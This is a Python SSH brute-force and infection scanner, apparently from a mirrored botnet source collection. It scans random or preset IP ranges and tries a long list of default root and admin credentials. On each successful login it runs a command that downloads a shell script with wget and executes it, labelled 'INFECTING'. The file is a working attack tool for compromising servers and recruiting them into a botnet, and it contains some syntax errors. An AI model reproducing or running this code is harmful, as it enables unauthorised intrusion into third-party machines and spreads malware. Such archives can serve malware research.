Mirrors
/
TL-BOTS
mirror of https://github.com/threatland/TL-BOTS
6
0
Fork 0
Code Issues Projects Releases Wiki Activity
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.Generic.SSH/XanaxScan - edit.py

425 lines
17 KiB
Python
Raw Permalink Blame History

#!/usr/bin/env python
#CREDZ TO 1337INGS AND ~B1NARY~
import threading, paramiko, random, socket, time, sys
cmd='cd /tmp; rm -rf *; wget -q http://host/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *\r\n'
blacklist = [
'127'
]
passwords = [
"root:root",
"root:lol",
"root:admin",
"ubnt:ubnt"
"root:1234",
"admin:1234",
"root:toor",
"root:sex",
"root:test",
"pi:pi",
"root:cent6"
"root:admin",
"root:root",
"admin:password",
"ubnt:ubnt"
"root:1234",
"root:123",
"root:12345",
"root:Password",
"root:lol",
"root:toor",
"root:centos7",
"root:qwerty",
"root:centos6",
"root:pussy",
"root:user",
"root:money",
"root:love",
"root:1",
"root:2",
"root:3",
"root:0",
"root:987",
"root:5",
"root:beer",
"root:cia",
"root:fbi",
"root:hack",
"root:bank",
"root:gov",
"root:youtube",
"root:website",
"root:server",
"root:weed",
"root:420",
"root:computer",
"root:linux",
"root:debain",
"root:cent",
"root:vps",
"root:VPS",
"root:light",
"root:cap",
"root:hat",
"root:butt",
"root:but",
"root:name",
"root:god",
"root:work",
"root:job",
"root:bailey",
"root:123456",
"root:michael",
"root:superman",
"root:batman",
"root:starwars",
"root:startrek",
"root:desktop",
"root:windows",
"root:netflix",
"root:shoe",
"root:foot",
"root:tor",
"root:rot",
"root:roots",
"root:root1",
"root:root2",
"root:root3",
"root:root4",
"root:root5",
"root:root6",
"root:root12",
"root:root123",
"root:root1234",
"root:root12345",
"root:root123456",
"root:iphone",
"root:apple",
"root:verizon",
"root:talktalk",
"tim:tim",
"root:at&t",
"root:strighttalk",
"root:|",
"root:=",
"root:abc",
"root:xyz",
"root:abc1",
"root:abc12",
"root:abc123",
"root:abc1234",
"root:abc12345",
"root:abc123456",
"root:sync",
"root:-",
"root:",
"root: ",
"root:a",
"root:z",
"root:python",
"root:perl",
"root:dos",
"root:sql",
"root:database",
"root:minecraft",
"root:minecraft1",
"root:minecraft2",
"root:minecraft3",
"root:minecraft4",
"root:minecraft5",
"root:minecraft6",
"root:minecraft7",
"root:minecraft8",
"root:minecraft9",
"root:minecraft0",
"root:minecraft12",
"root:minecraft123",
"root:minecraft1234",
"root:minecraft12345",
"root:minecraft123456",
"root:minecraft1234567"
"root:minecraft12345678",
"root:minecraft123456789",
"root:minecraft1234567890",
"root:login",
"root:login123",
"root:solo",
"root:passw0rd",
"root:password123",
"root:admins",
"root:cigs",
"root:ruby",
"root:html",
"root:php",
"root:youtuber",
"root:pewdiepiefan",
"root:pewdiepie",
"root:cod",
"root:android",
"root:phone",
"root:pass",
"root:school",
"root:q",
"root:webserver",
"root:college",
"root:keys",
"root:dog",
"root:cat",
"admin:admin",
"admin:admin1",
"admin:admin2",
"admin:admin3",
"admin:admin4",
"admin:admin5",
"admin:admin6",
"admin:admin7",
"admin:admin8",
"admin:admin9",
"admin:admin0",
"admin:admin12",
"admin:admin123",
"admin:admin1234",
"admin:admin12345",
"admin:admin123456"
"admin:admin1234567",
"admin:admin12345678",
"admin:admin123456789",
"admin:admin1234567890",
"admin:admin098",
"admin:admin987",
"admin:admin321",
]
#IPRANGES
usa = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
russia = ["122","131","161","37","186","187","31","188","201","2","200"]
lsd = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
shrooms = ["122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
xanax = ["23.96","23.97","23.98","23.99","23.100","23.101","23.102","23.103","70.37","104.40","104.41","104.42","104.43","104.44","104.45","104.46","104.47","104.146","104.147","104.208","104.209","104.210","104.210","104.211","104.212","104.213","104.214","104.215","138.91","168.61","168.62","168.63","113.53","125.125","125.126","125.127"]
busybox = ["199.180","142.0","158.69"]
wholesale = ["208.67"]
ecatel = ["89.248"]
china = ["65.19","220.248"]
india = ["1.6","1.7","1.22","1.23"]
cisco = ["1"]
cdn = ["217.106","217.106"]
ovh = ["5.39","5.135","5.196","8.7","8.18","8.20","8.21","8.24","8.29","8.30","8.33","37.59","37.187","46.105"]
lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
lucky2 = ["122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
lucky3 = ["23.96","23.97","23.98","23.99","23.100","23.101","23.102","23.103","70.37","104.40","104.41","104.42","104.43","104.44","104.45","104.46","104.47","104.146","104.147","104.208","104.209","104.210","104.210","104.211","104.212","104.213","104.214","104.215","138.91","168.61","168.62","168.63","113.53","125.125","125.126","125.127"]
lucky2 = ["119.91","119.92","119.93","113.53"]
lol = ["1","2","5","119","180","113","125","122","46","101",""]
load = ["125.25","125.26","125.27","119.92","119.93","180.180","113.53","185.52","122.52","122.53"]
god = ["122.52","122.53","119.92","119.93"]
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
#PASSFILES
if sys.argv[4] == '1':
passwords = ["root:root", "root:admin", "root:root", "admin:password", "ubnt:ubnt" "root:1234", "root:123", "root:12345", "root:Password", "root:lol"]
if sys.argv[4] == '2':
passwords = ["root:toor", "root:centos7", "root:qwerty", "root:centos6", "root:pussy", "root:user", "root:money", "root:love", "root:1", "root:2"]
if sys.argv[4] == '3':
passwords = ["root:3", "root:0", "root:987", "root:5", "root:beer", "root:cia", "root:fbi", "root:hack", "root:bank", "root:gov", "root:youtube"]
if sys.argv[4] == '4':
passwords = ["root:website", "root:server", "root:weed", "root:420", "root:computer", "root:linux", "root:debain", "root:cent", "root:vps"]
if sys.argv[4] == '5':
passwords = ["root:VPS", "root:light", "root:cap", "root:hat", "root:butt", "root:but", "root:name", "root:god", "root:work", "root:job"]
if sys.argv[4] == '6':
passwords = ["root:bailey", "root:123456", "root:michael", "root:superman", "root:batman", "root:starwars", "root:startrek", "root:desktop"]
if sys.argv[4] == '7':
passwords = ["root:windows", "root:netflix", "root:shoe", "root:foot", "root:tor", "root:rot", "root:roots", "root:root1", "root:root2"]
if sys.argv[4] == '8':
passwords = ["root:root3","root:root4","root:root5","root:root6","root:root12","root:root123","root:root1234","root:root12345","root:root123456"]
if sys.argv[4] == '9':
passwords = ["root:iphone","root:apple","root:verizon","root:talktalk","tim:tim","root:at&t","root:strighttalk","root:|","root:=","root:abc"]
if sys.argv[4] == '10':
passwords = ["root:xyz","root:abc1","root:abc12","root:abc123","root:abc1234","root:abc12345","root:abc123456","root:sync","root:-","root:"]
if sys.argv[4] == '11':
passwords = ["root: ","root:a","root:z","root:python","root:perl","root:dos","root:sql","root:database"]
if sys.argv[4] == '12':
passwords = ["root:minecraft","root:minecraft1""root:minecraft2","root:minecraft3","root:minecraft4","root:minecraft5"]
if sys.argv[4] == '13':
passwords = ["root:minecraft9","root:minecraft0","root:minecraft12","root:minecraft123","root:minecraft1234","root:minecraft12345","root:minecraft123456"]
if sys.argv[4] == '14':
passwords = ["root:minecraft6","root:minecraft7","root:minecraft8","root:minecraft1234567","root:minecraft12345678","root:minecraft123456789","root:minecraft1234567890"]
if sys.argv[4] == '15':
passwords = ["root:login","root:login123","root:solo","root:passw0rd","root:password123","root:admins","root:cigs","root:ruby","root:html","root:php","root:youtuber"]
if sys.argv[4] == '16':
passwords = ["root:pewdiepiefan","root:pewdiepie","root:cod","root:android","root:phone","root:pass","root:school","root:q","root:webserver","root:college","root:keys"]
if sys.argv[4] == '17':
passwords = ["root:dog","root:cat"]
if sys.argv[4] == '18':
passwords = ["admin:admin","admin:admin1","admin:admin2","admin:admin3","admin:admin4","admin:admin5","admin:admin6","admin:admin7","admin:admin8","admin:admin9"]
if sys.argv[4] == '19':
passwords = ["admin:admin0","admin:admin12","admin:admin123","admin:admin1234","admin:admin12345","admin:admin123456""admin:admin1234567","admin:admin12345678"]
if sys.argv[4] == '20':
passwords = ["admin:admin123456789","admin:admin1234567890","admin:admin098","admin:admin987","admin:admin321","root:123",]
if sys.argv[4] == 'default':
passwords = ["root:root", "root:admin", "admin:1234"]
if sys.argv[4] == 'lmfao':
passwords = ["root:root", "root:toor", "root:admin", "admin:1234", "oracle:oracle", "root:alpine"]
if sys.argv[4] == 'routers':
passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password"]
if sys.argv[4] == 'perl':
passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ]
if sys.argv[4] == 'ubuntu':
passwords = [ "ubnt:ubnt", "ubnt:1234", "ubnt:password" ]
if sys.argv[4] == 'root':
passwords = [ "root:root","root:test" ]
if sys.argv[4] == 'vps1':
passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Love2020", "root:Zero", "root:Password", "root:password"]
if sys.argv[4] == 'vps2':
passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"]
if sys.argv[4] == 'vps3':
passwords = [ "root:maxided", "root:centos6svm", "root:football", "root:monkey", "root:696969", "root:abc123"]
if sys.argv[4] == 'r00ted':
passwords = [ "localhost:root", "B1NARY:B1NARY", "root:r00tnull3d#", "root:Flunzy2016", "bash:root"]
if sys.argv[4] == 'brute':
passwords = [ "root:centos6svm", "root:root", "root:toor", "root:abc123", "root:maxided"]
if sys.argv[4] == 'lol':
passwords = [ "admin:1234"]
#IP CLASS
ipclassinfo = sys.argv[2]
if ipclassinfo == "A":
ip1 = sys.argv[3]
elif ipclassinfo == "B":
ip1 = sys.argv[3].split(".")[0]
ip2 = sys.argv[3].split(".")[1]
elif ipclassinfo == "C":
ips = sys.argv[3].split(".")
num=0
for ip in ips:
num=num+1
if num == 1:
ip1 = ip
elif num == 2:
ip2 = ip
elif num == 3:
ip3 = ip
class sshscanner(threading.Thread):
global passwords
global ipclassinfo
if ipclassinfo == "A":
global ip1
elif ipclassinfo == "B":
global ip1
global ip2
elif ipclassinfo == "C":
global ip1
global ip2
global ip3
def run(self):
while 1:
try:
while 1:
thisipisbad='no'
if ipclassinfo == "A":
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "B":
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "C":
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY1":
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY2":
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY3":
self.host = random.choice(lucky3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "USA":
self.host = random.choice(usa)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "BRAZIL":
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "RUSSIA":
self.host = random.choice(russia)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LSD":
self.host = random.choice(lsd)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "SHROOMS":
self.host = random.choice(shrooms)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "XANAX":
self.host = random.choice(xanax)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "CISCO":
self.host = random.choice(cisco)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "BUSYBOX":
self.host = random.choice(busybox)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "OVH":
self.host = random.choice(ovh)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "WHOLESALE":
self.host = random.choice(wholesale)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "ECATEL":
self.host = random.choice(ecatel)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "CHINA":
self.host = random.choice(china)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "INDIA":
self.host = random.choice(india)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "CDN":
self.host = random.choice(cdn)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "AWS"
self.host = random.choice(aws)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "RANDOM":
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
else:
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
for badip in blacklist:
if badip in self.host:
thisipisbad='yes'
if thisipisbad=='no':
break
username='root'
password=""
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.host, port))
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
dobreak=True
break
except:
pass
if True == dobreak:
break
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
if badserver == False:
print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port)
ssh.exec_command(""+cmd+"")
time.sleep(20)
ssh.close()
except:
pass
for x in range(0,int(sys.argv[1])):
try:
t = sshscanner()
t.start()
except:
pass
Reference in New Issue View Git Blame Copy Permalink